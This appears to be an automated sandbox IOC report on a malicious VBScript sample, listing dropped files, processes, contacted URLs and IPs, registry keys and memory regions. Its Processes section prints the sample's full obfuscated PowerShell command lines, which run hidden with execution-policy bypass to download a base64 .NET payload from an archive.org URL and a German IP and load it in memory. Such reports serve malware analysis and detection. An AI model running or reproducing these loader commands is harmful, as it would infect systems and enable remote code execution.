IOC Report
ZJbugHcHda.vbs

loading gif

Files

File Path
Type
Category
Malicious
ZJbugHcHda.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5i3jdj22.3ak.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1inyfbo.5zh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mizk0jab.mrd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opd2forr.11h.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ZJbugHcHda.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbElkWzFdKyRTSEVsTGlEWzEzXSsneCcpICggKCd4UGl1cmwnKycgPScrJyBzJysna3JodHRwJysnczovLycrJ2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdicrJ2Uub3JnJysnLzI0L2l0JysnZScrJ21zL2RldGFoLScrJ25vdGUtJysndi9EZScrJ3RhaE5vdGVWJysnLnR4dHNrJysncjt4UGknKydiYScrJ3NlJysnNjRDbycrJ24nKyd0ZScrJ250ID0gKCcrJ05ldy1PYmplJysnY3QgUycrJ3lzdGVtLicrJ05ldC5XZWJDJysnbGknKydlbnQpLicrJ0Rvd25sJysnb2FkU3RyaW4nKydnKHhQaXVybCk7JysneFAnKydpJysnYmluYXJ5JysnQ29udGUnKydudCA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CJysnYScrJ3NlNjRTJysndHJpbicrJ2coeFBpJysnYmFzZTY0Q29udGUnKyduJysndCk7eFBpYXMnKydzZW1ibHkgPScrJyBbUmVmbGVjJysndCcrJ2knKydvbi5Bc3NlbWJseScrJ106JysnOkwnKydvYWQoJysneFBpYmluJysnYXInKyd5Q29udGVudCk7eFAnKydpdHknKydwZSA9IHgnKydQaWFzJysnc2VtJysnYicrJ2x5LkdlJysndFR5cCcrJ2Uoc2tyJysnUnUnKyduUCcrJ0UuSG9tZXNrcicrJyk7eFBpJysnbWUnKyd0aG9kID0geFBpdHknKydwZS5HZXRNZXQnKydobycrJ2QoJysnc2tyVkFJc2tyJysnKTt4UCcrJ2knKydtZXRob2QnKycuSW52Jysnb2tlKHhQaW51bGwnKycsJysnIFsnKydvYmplJysnY3RbXV1AJysnKHNrcnR4dC5LS1JPTksnKycvYmsvcHBtYXgnKycvODQyLjcnKycyJysnMi41NTIuNDMxLy86cCcrJ3R0aHNrciAsJysnICcrJ3MnKydrcmRlc2F0aXZhZG8nKydza3IgLCAnKydza3JkJysnZXNhdGl2JysnYWQnKydvcycrJ2snKydyICcrJywgc2tyZCcrJ2UnKydzYXRpdmFkb3Nrcixza3JSZScrJ2dBcycrJ21zaycrJ3Isc2tyc2tyKSknKS5SRVBsQWNFKCd4UGknLCckJykuUkVQbEFjRSgoW2NIQXJdMTE1K1tjSEFyXTEwNytbY0hBcl0xMTQpLFtTVHJpTkddW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllId[1]+$SHElLiD[13]+'x') ( ('xPiurl'+' ='+' s'+'krhttp'+'s://'+'ia600100'+'.us.'+'archiv'+'e.org'+'/24/it'+'e'+'ms/detah-'+'note-'+'v/De'+'tahNoteV'+'.txtsk'+'r;xPi'+'ba'+'se'+'64Co'+'n'+'te'+'nt = ('+'New-Obje'+'ct S'+'ystem.'+'Net.WebC'+'li'+'ent).'+'Downl'+'oadStrin'+'g(xPiurl);'+'xP'+'i'+'binary'+'Conte'+'nt = [Syst'+'em.Convert]::FromB'+'a'+'se64S'+'trin'+'g(xPi'+'base64Conte'+'n'+'t);xPias'+'sembly ='+' [Reflec'+'t'+'i'+'on.Assembly'+']:'+':L'+'oad('+'xPibin'+'ar'+'yContent);xP'+'ity'+'pe = x'+'Pias'+'sem'+'b'+'ly.Ge'+'tTyp'+'e(skr'+'Ru'+'nP'+'E.Homeskr'+');xPi'+'me'+'thod = xPity'+'pe.GetMet'+'ho'+'d('+'skrVAIskr'+');xP'+'i'+'method'+'.Inv'+'oke(xPinull'+','+' ['+'obje'+'ct[]]@'+'(skrtxt.KKRONK'+'/bk/ppmax'+'/842.7'+'2'+'2.552.431//:p'+'tthskr ,'+' '+'s'+'krdesativado'+'skr , '+'skrd'+'esativ'+'ad'+'os'+'k'+'r '+', skrd'+'e'+'sativadoskr,skrRe'+'gAs'+'msk'+'r,skrskr))').REPlAcE('xPi','$').REPlAcE(([cHAr]115+[cHAr]107+[cHAr]114),[STriNG][cHAr]39))"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
207.241.227.240
http://pesterbdd.com/images/Pester.png
unknown
http://134.255.227.248/xampp/kb/KNORKK.txt
134.255.227.248
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://ia600100.us.arX
unknown
https://ia600100.us.archive.org
unknown
http://134.255.227.248
unknown
http://134.255.227.248(
unknown
https://aka.ms/pscore6
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
http://ia600100.us.archive.org
unknown
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ia600100.us.archive.org
207.241.227.240
198.187.3.20.in-addr.arpa
unknown

IPs

IP
Domain
Country
Malicious
134.255.227.248
unknown
Germany
207.241.227.240
ia600100.us.archive.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1B044580000
trusted library section
page read and write
malicious
1B03C578000
trusted library allocation
page read and write
malicious
18B684F0000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
15E75BF6000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
6408EFB000
stack
page read and write
15E73ED4000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
15E75C1B000
heap
page read and write
15E73E1A000
heap
page read and write
15E75C13000
heap
page read and write
15E75C3B000
heap
page read and write
64085EF000
stack
page read and write
7FFD9BB13000
trusted library allocation
page read and write
7FFD9B8F2000
trusted library allocation
page read and write
15E75BE5000
heap
page read and write
15E75DE0000
heap
page read and write
15E73D60000
heap
page read and write
1B02C8D6000
trusted library allocation
page read and write
7FFD9B774000
trusted library allocation
page read and write
15E75CA1000
heap
page read and write
15E75D62000
heap
page read and write
15E75E61000
heap
page read and write
7FFD9B921000
trusted library allocation
page read and write
15E75D4E000
heap
page read and write
6E81EFF000
stack
page read and write
18B6A020000
heap
page read and write
15E75C4E000
heap
page read and write
18B00001000
trusted library allocation
page read and write
18B00023000
trusted library allocation
page read and write
15E75C8C000
heap
page read and write
15E757A0000
heap
page read and write
15E75BF3000
heap
page read and write
1B029E50000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
18B10010000
trusted library allocation
page read and write
15E75CA1000
heap
page read and write
15E75D64000
heap
page read and write
15E75CE0000
heap
page read and write
63B3FE000
stack
page read and write
15E75BE3000
heap
page read and write
15E75BE2000
heap
page read and write
15E75CA1000
heap
page read and write
63B0FF000
stack
page read and write
1B044430000
heap
page read and write
7FFD9B76C000
trusted library allocation
page read and write
64085AE000
stack
page read and write
18B6A790000
heap
page read and write
15E75D6F000
heap
page read and write
15E75BE9000
heap
page read and write
1B029E70000
heap
page read and write
18B68578000
heap
page read and write
18B0011F000
trusted library allocation
page read and write
7DF411530000
trusted library allocation
page execute and read and write
1B02C351000
trusted library allocation
page read and write
15E73E19000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1B02A0C0000
trusted library allocation
page read and write
15E75C00000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
7FFD9B901000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1B044044000
heap
page read and write
15E75C22000
heap
page read and write
1B04402F000
heap
page read and write
1B02BA70000
heap
page read and write
6408E7F000
stack
page read and write
15E75BE1000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
6E81C7E000
stack
page read and write
15E75C92000
heap
page read and write
6E81DFF000
stack
page read and write
18B69F37000
heap
page execute and read and write
1B02DC5A000
trusted library allocation
page read and write
1B029EEE000
heap
page read and write
1B02C386000
trusted library allocation
page read and write
15E75C7B000
heap
page read and write
1B03C258000
trusted library allocation
page read and write
15E75C27000
heap
page read and write
15E75C2E000
heap
page read and write
6E81F7E000
stack
page read and write
640887E000
stack
page read and write
7FFD9B806000
trusted library allocation
page read and write
15E75CA1000
heap
page read and write
18B6A670000
heap
page read and write
18B69F30000
heap
page execute and read and write
1B02C183000
trusted library allocation
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
1B02C346000
trusted library allocation
page read and write
15E740B0000
heap
page read and write
6E820FE000
stack
page read and write
18B685E4000
heap
page read and write
1B02C35E000
trusted library allocation
page read and write
18B6A026000
heap
page read and write
1B029F00000
heap
page read and write
18B68530000
heap
page read and write
1B02DC56000
trusted library allocation
page read and write
640852E000
stack
page read and write
18B68503000
heap
page read and write
15E75C5B000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
15E75C3E000
heap
page read and write
7FFD9B92A000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
15E75CA1000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
15E73E1E000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1B02B920000
trusted library allocation
page read and write
18B6A750000
heap
page execute and read and write
7FFD9B810000
trusted library allocation
page execute and read and write
18B69EF0000
heap
page readonly
15E75BE3000
heap
page read and write
1B029EFA000
heap
page read and write
64084A3000
stack
page read and write
7FFD9BA50000
trusted library allocation
page read and write
15E75C00000
heap
page read and write
1B0441EB000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
15E75C16000
heap
page read and write
6E81CFE000
stack
page read and write
18B0009C000
trusted library allocation
page read and write
7FFD9B826000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
7FFD9BAF1000
trusted library allocation
page read and write
18B00161000
trusted library allocation
page read and write
15E75C5B000
heap
page read and write
15E75C58000
heap
page read and write
18B6A5F3000
heap
page read and write
63A91A000
stack
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1B029EB9000
heap
page read and write
15E73EC3000
heap
page read and write
15E73E1F000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
18B004F0000
trusted library allocation
page read and write
1B04425B000
heap
page read and write
15E73EE5000
heap
page read and write
15E75CA1000
heap
page read and write
15E75C4B000
heap
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9B760000
trusted library allocation
page read and write
15E75C00000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
18B68534000
heap
page read and write
18B69F40000
heap
page execute and read and write
15E75BE4000
heap
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
15E75C67000
heap
page read and write
15E75CE1000
heap
page read and write
18B6A5E8000
heap
page read and write
15E75BE5000
heap
page read and write
15E75D81000
heap
page read and write
18B6A5EB000
heap
page read and write
1B02BF61000
trusted library allocation
page read and write
18B686D0000
heap
page read and write
6E81E7C000
stack
page read and write
1B03BF61000
trusted library allocation
page read and write
6E819A3000
stack
page read and write
1B02A080000
heap
page read and write
15E75C64000
heap
page read and write
63B5FC000
stack
page read and write
1B03C24A000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
7FFD9B890000
trusted library allocation
page execute and read and write
6408DFE000
stack
page read and write
1B03CF78000
trusted library allocation
page read and write
7FFD9B90A000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
15E75BFA000
heap
page read and write
18B0001B000
trusted library allocation
page read and write
18B6857D000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
15E73EC4000
heap
page read and write
18B68550000
heap
page read and write
6E823FE000
stack
page read and write
1B044239000
heap
page read and write
1B0441D2000
heap
page read and write
1B02A0E0000
trusted library allocation
page read and write
6408D7E000
stack
page read and write
15E740B5000
heap
page read and write
15E75D43000
heap
page read and write
15E75BEE000
heap
page read and write
1B02BDC5000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
18B685E0000
heap
page read and write
1B02B8B0000
trusted library allocation
page read and write
18B00533000
trusted library allocation
page read and write
1B02B8E0000
trusted library allocation
page read and write
15E75D44000
heap
page read and write
63ACFE000
stack
page read and write
63B4FF000
stack
page read and write
640994D000
stack
page read and write
18B6853A000
heap
page read and write
6E8207E000
stack
page read and write
1B02D63C000
trusted library allocation
page read and write
1B043F60000
heap
page read and write
18B0011C000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
15E73E6F000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1B044229000
heap
page read and write
15E73EBA000
heap
page read and write
1B029F34000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
15E75BEB000
heap
page read and write
7FFD9BB09000
trusted library allocation
page read and write
15E75C94000
heap
page read and write
15E75BEE000
heap
page read and write
15E75DE1000
heap
page read and write
1B02A105000
heap
page read and write
6E822FE000
stack
page read and write
18B00123000
trusted library allocation
page read and write
1B044080000
heap
page execute and read and write
15E73C60000
heap
page read and write
15E75E60000
heap
page read and write
18B684C0000
heap
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
15E75C37000
heap
page read and write
1B029F0E000
heap
page read and write
1B0440B0000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
63AFFF000
stack
page read and write
1B02C3B0000
trusted library allocation
page read and write
1B043FEC000
heap
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
6E81FFE000
stack
page read and write
18B69F00000
trusted library allocation
page read and write
15E75CA1000
heap
page read and write
1B02A10B000
heap
page read and write
18B6A595000
heap
page read and write
1B02A100000
heap
page read and write
1B02D661000
trusted library allocation
page read and write
6408B77000
stack
page read and write
64089FE000
stack
page read and write
15E75D81000
heap
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
7FFD9BAA0000
trusted library allocation
page read and write
15E75C07000
heap
page read and write
1B02C38A000
trusted library allocation
page read and write
7FFD9B78B000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
15E73E1F000
heap
page read and write
15E75D8A000
heap
page read and write
18B0004C000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1B02D641000
trusted library allocation
page read and write
15E75C6C000
heap
page read and write
15E75D81000
heap
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
1B029EF0000
heap
page read and write
18B0006E000
trusted library allocation
page read and write
1B02BA76000
heap
page read and write
18B0015B000
trusted library allocation
page read and write
1B02DB90000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
18B00108000
trusted library allocation
page read and write
1B02BA10000
heap
page read and write
15E75D5C000
heap
page read and write
15E75D55000
heap
page read and write
7FFD9B952000
trusted library allocation
page read and write
15E75C73000
heap
page read and write
7FFD9B752000
trusted library allocation
page read and write
15E73E7A000
heap
page read and write
1B044190000
heap
page read and write
7FFD9B932000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
1B02D689000
trusted library allocation
page read and write
6408BF9000
stack
page read and write
63ADFE000
stack
page read and write
64088FD000
stack
page read and write
6408C7E000
stack
page read and write
6408A7E000
stack
page read and write
15E75C67000
heap
page read and write
15E75D4E000
heap
page read and write
1B044256000
heap
page read and write
18B00604000
trusted library allocation
page read and write
15E75C80000
heap
page read and write
7FFD9B772000
trusted library allocation
page read and write
7FFD9B800000
trusted library allocation
page read and write
18B6A02A000
heap
page read and write
64098CE000
stack
page read and write
15E73D40000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
6E8247B000
stack
page read and write
1B02C57A000
trusted library allocation
page read and write
18B004C8000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
15E75D6E000
heap
page read and write
15E75D81000
heap
page read and write
15E75BFB000
heap
page read and write
1B043FAB000
heap
page read and write
15E75CA1000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1B044029000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
15E73E6F000
heap
page read and write
15E75CA1000
heap
page read and write
18B6A550000
heap
page read and write
18B1006F000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B754000
trusted library allocation
page read and write
1B044086000
heap
page execute and read and write
6408AF8000
stack
page read and write
18B685ED000
heap
page read and write
15E75BE0000
heap
page read and write
1B029EB0000
heap
page read and write
15E75C0E000
heap
page read and write
1B02C772000
trusted library allocation
page read and write
6E81D7E000
stack
page read and write
15E75BF5000
heap
page read and write
15E75D5F000
heap
page read and write
15E75C8D000
heap
page read and write
18B0010E000
trusted library allocation
page read and write
15E75BEE000
heap
page read and write
1B02D8D2000
trusted library allocation
page read and write
15E75C87000
heap
page read and write
15E75BE9000
heap
page read and write
6E819EF000
stack
page read and write
15E75C78000
heap
page read and write
18B68725000
heap
page read and write
18B69EE0000
trusted library allocation
page read and write
1B02D888000
trusted library allocation
page read and write
18B6A547000
heap
page read and write
15E75C60000
heap
page read and write
15E75C21000
heap
page read and write
15E75BE6000
heap
page read and write
63B2FD000
stack
page read and write
1B043FC7000
heap
page read and write
15E75C47000
heap
page read and write
1B02D90F000
trusted library allocation
page read and write
1B02D665000
trusted library allocation
page read and write
15E75BEB000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1B029EF2000
heap
page read and write
15E75C02000
heap
page read and write
18B6A540000
heap
page read and write
18B10001000
trusted library allocation
page read and write
18B6AA40000
heap
page read and write
15E73E7A000
heap
page read and write
18B00051000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
1B02B9F0000
heap
page execute and read and write
15E75D67000
heap
page read and write
15E75D61000
heap
page read and write
1B02C565000
trusted library allocation
page read and write
1B02C362000
trusted library allocation
page read and write
15E73E2F000
heap
page read and write
18B0004F000
trusted library allocation
page read and write
15E75BF0000
heap
page read and write
1B029E40000
heap
page read and write
18B684A0000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
1B029F3A000
heap
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
18B6A621000
heap
page read and write
1B02D8B4000
trusted library allocation
page read and write
7FFD9BB04000
trusted library allocation
page read and write
1B044039000
heap
page read and write
18B68720000
heap
page read and write
15E73DF0000
heap
page read and write
640897F000
stack
page read and write
15E75CA1000
heap
page read and write
15E73ED4000
heap
page read and write
1B03BFCF000
trusted library allocation
page read and write
15E75CA1000
heap
page read and write
18B68536000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
1B02C6CB000
trusted library allocation
page read and write
15E75BE2000
heap
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
18B6A5F0000
heap
page read and write
18B6A634000
heap
page read and write
7FFD9B820000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
18B0010B000
trusted library allocation
page read and write
7FFD9B7CC000
trusted library allocation
page execute and read and write
18B68710000
trusted library allocation
page read and write
15E73EE6000
heap
page read and write
7FFD9B790000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
18B68490000
heap
page read and write
15E75D81000
heap
page read and write
1B02D2D6000
trusted library allocation
page read and write
15E75BF4000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
15E75BE5000
heap
page read and write
1B04426A000
heap
page read and write
1B02D654000
trusted library allocation
page read and write
15E75BE5000
heap
page read and write
18B6A60E000
heap
page read and write
15E75C57000
heap
page read and write
1B02BF50000
heap
page execute and read and write
18B00068000
trusted library allocation
page read and write
1B029EC1000
heap
page read and write
1B02BFE0000
trusted library allocation
page read and write
15E75CA1000
heap
page read and write
15E75CA1000
heap
page read and write
15E75C2B000
heap
page read and write
15E75D6F000
heap
page read and write
18B6A530000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
18B0060E000
trusted library allocation
page read and write
15E75D54000
heap
page read and write
1B03BF70000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
1B02A0F0000
heap
page readonly
There are 408 hidden memdumps, click here to show them.